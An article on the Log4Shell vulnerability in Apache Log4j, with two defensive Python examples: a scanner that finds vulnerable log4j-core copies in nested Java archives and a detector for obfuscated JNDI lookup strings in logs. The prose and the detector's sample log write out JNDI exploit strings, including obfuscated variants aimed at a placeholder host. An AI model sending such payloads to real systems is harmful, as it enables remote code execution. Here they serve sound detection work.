On December 9, 2021, a critical zero-day vulnerability in Apache Log4j 2, a widely used Java logging library, was disclosed publicly (CVE-2021-44228, quickly nicknamed Log4Shell) and set off an industry-wide scramble.
Java is among the most widely used programming languages and is practically ubiquitous, and Log4j 2 is one of its most popular logging libraries; by one estimate, some 15 billion devices worldwide run Java. The worst part is that vulnerable copies of Log4j are hard to find and easy to exploit. The library is usually pulled in as a transitive dependency and buried inside other JARs, WARs and vendor appliances, so a simple inventory rarely surfaces it, while an attacker needs nothing more than to get a string of the form "${jndi:ldap://attacker-host/x}" into any field the application logs. That puts hundreds of millions of Java-based applications, databases and devices at high risk.
The exposure is unprecedented in scope and reaches every type of organization in every industry. Because the exploit is trivial while locating every vulnerable copy inside your own estate is not, Log4Shell is the proverbial needle in a haystack.
Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly called Log4Shell one of the most serious vulnerabilities she has seen in her decades-long career, if not the most serious. She urged business leaders not to delay remediation, noting that it could take years to address fully. Fixing it is not a simple, one-time patch: it requires multiple detection methods, since a version check of top-level packages misses copies bundled inside other archives and copies that were hand-patched in place.
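To make the "hard to find" point concrete, here is an added example, not code from the original article or from any Log4j project tooling, of the kind of scanner defenders wrote in the days after disclosure. It walks a directory, opens every JAR, WAR and EAR, recurses into archives nested inside archives, and reports each copy of log4j-core with its version and a status. The archive layout, entry names and sample files it scans are constructed in a temporary directory; the class bytes are fake placeholders, and the version-to-CVE mapping follows the Apache advisories.

```python
"""Find log4j-core inside Java archives, recursing into nested JAR/WAR/EAR files.

Added example (not from the original article). Standard library only; the
archives it scans are constructed in a temporary directory with fake class
bytes, so it runs offline.
"""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MAX_DEPTH = 6  # guard against zip bombs and pathological nesting


def version_tuple(v):
    """'2.14.1' -> (2, 14, 1); pre-release tags are ignored ('2.0-beta9' -> (2, 0, 0))."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])]
    return tuple(nums + [0] * (3 - len(nums)))


def assess(version, has_jndi_lookup):
    """Classify a log4j-core copy from its version and whether JndiLookup.class is present."""
    v = version_tuple(version)  # an unparseable version becomes (0, 0, 0) and is flagged for review
    if v < (2, 15, 0):
        cve = "CVE-2021-44228 (RCE)"
    elif v == (2, 15, 0):
        cve = "CVE-2021-45046 (RCE in non-default configurations)"
    elif v == (2, 16, 0):
        cve = "CVE-2021-45105 (DoS)"
    else:
        return "ok"
    if v < (2, 16, 0) and not has_jndi_lookup:
        # The interim mitigation was to delete JndiLookup.class from the jar in place.
        return "mitigated (JndiLookup.class removed; still upgrade): " + cve
    return "VULNERABLE: " + cve


def scan_archive(data, path, findings, depth=0):
    """Record (path, version, status) for every log4j-core in a zip blob, recursing into nested archives."""
    if depth > MAX_DEPTH:
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PROPS in names:
        m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
        version = m.group(1).strip() if m else "unknown"
        findings.append((path, version, assess(version, JNDI_LOOKUP in names)))
    elif JNDI_LOOKUP in names:
        # Some repackaged builds drop pom.properties; the class alone is still a finding.
        findings.append((path, None, "VULNERABLE: JndiLookup.class present, version unknown"))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXTS):
            scan_archive(zf.read(name), path + "!" + name, findings, depth + 1)


def scan_dir(root):
    """Walk a directory tree; return sorted findings with paths relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, f)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), rel, findings)
    return sorted(findings)


def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in entries.items():
            z.writestr(name, content)
    return buf.getvalue()


def build_sample(root):
    """Constructed fixtures: real entry names and pom layout, fake class bytes."""
    fake_class = b"\xca\xfe\xba\xbe"
    vuln = _zip_bytes({POM_PROPS: "version=2.14.1\n", JNDI_LOOKUP: fake_class})
    fixed = _zip_bytes({POM_PROPS: "version=2.17.1\n", JNDI_LOOKUP: fake_class})
    stripped = _zip_bytes({POM_PROPS: "version=2.14.1\n"})  # class deleted per interim advice
    war = _zip_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": vuln,
                      "WEB-INF/lib/log4j-core-2.17.1.jar": fixed})
    os.makedirs(os.path.join(root, "tools"))
    with open(os.path.join(root, "app.ear"), "wb") as fh:
        fh.write(_zip_bytes({"app.war": war}))  # jar inside war inside ear
    with open(os.path.join(root, "tools", "patched-inplace.jar"), "wb") as fh:
        fh.write(stripped)


def demo():
    """Build the fixtures in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return scan_dir(root)


if __name__ == "__main__":
    for path, version, status in demo():
        print(f"{status:55s} {version or '?':8s} {path}")
```

The status column is why a version check alone is not enough: the scanner also records whether JndiLookup.class is present, because the interim mitigation was to delete that class from the jar, and a copy that was patched that way reports the old version string. Builds that relocate the package to a different class path are outside what this example matches and need a content hash or bytecode scan instead.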
Fast to patch, faster to exploit
As many companies prepared to operate with skeleton IT staff over the last two weeks of 2021, attackers saw an opportunity. It did not take long for the Log4j flaw to be exploited in the wild: nearly 1 million attack attempts were recorded within 72 hours of disclosure.
Worse, as part of an ongoing intelligence-gathering campaign, the Chinese state-sponsored group APT41, which has compromised government agencies in at least six US states over the past 10 months, quickly adopted Log4Shell as its primary vector for gaining access to the systems of at least two of those states.
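Most of the attack attempts counted above were automated probes that planted a JNDI lookup string in any field likely to be logged (User-Agent, request path, login form), and within a day scanners were using nested lookups such as "${${lower:j}ndi:...}" to slip past naive matching on the word "jndi". The following is an added example, not from the original article, of detection logic that undoes the common obfuscations before matching. The web-server log lines it scans are constructed, and the IP address is an RFC 5737 documentation address; the lookup resolution rules are a deliberately small emulation of Log4j's substitutor, covering lower, upper and default-value (":-") lookups only.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit strings in log lines, including the
nested-lookup obfuscations seen in the wild. Added example, not from the original
article; sample log lines are constructed.
"""
import re

INNER = re.compile(r"\$\{([^${}]*)\}")                      # a lookup with no lookup nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.I)       # what we want to find after de-obfuscation


def _resolve(inner):
    """Emulate the lookups attackers abuse to hide the word 'jndi' (assumed subset of Log4j)."""
    if inner.lower().startswith("lower:"):
        return inner[6:].lower()          # ${lower:J} -> j
    if inner.lower().startswith("upper:"):
        return inner[6:].upper()          # ${upper:n} -> N
    if ":-" in inner:
        return inner.split(":-", 1)[1]    # ${::-j}, ${env:NOPE:-j} -> j (default value of an unset key)
    # Unknown lookup: keep it, but hide the braces so the rewrite loop terminates.
    return "\x01" + inner + "\x02"


def normalize(s, max_rounds=20):
    """Repeatedly resolve innermost lookups, then restore the braces of unresolved ones."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s.replace("\x01", "${").replace("\x02", "}")


def find_jndi(line):
    """Return the JNDI target of every jndi lookup in the line, after de-obfuscation."""
    return [m.group(1).strip() for m in JNDI.finditer(normalize(line))]


def scan(lines):
    """Return (line_number, jndi_target) for every hit across a log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for target in find_jndi(line):
            hits.append((n, target))
    return hits


# Constructed access-log lines. Lines 2-5 carry payloads of the shapes seen in
# the first days of mass scanning; lines 1 and 6 are benign.
SAMPLE_LOG = [
    'GET / "Mozilla/5.0 (X11; Linux x86_64)"',
    'GET / "${jndi:ldap://203.0.113.5:1389/a}"',
    'GET / "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.5:1389/a}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5/b}"',
    'GET / "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//203.0.113.5/c}"',
    'GET /?q=${date:yyyy} "curl/7.79"',
]

if __name__ == "__main__":
    for n, target in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup -> {target}")
```

Two design points matter in practice. First, resolution runs innermost-first until nothing changes, which is how Log4j itself evaluates nested lookups, so the detector sees the same string the vulnerable library would have. Second, an unknown lookup is preserved rather than dropped, so a line such as "${date:yyyy}" is not mistaken for a hit, while a payload that wraps jndi in a lookup this emulation does not know still surfaces if the word survives normalization. Matching only on the literal "jndi:" without this step misses lines 3 to 5 entirely.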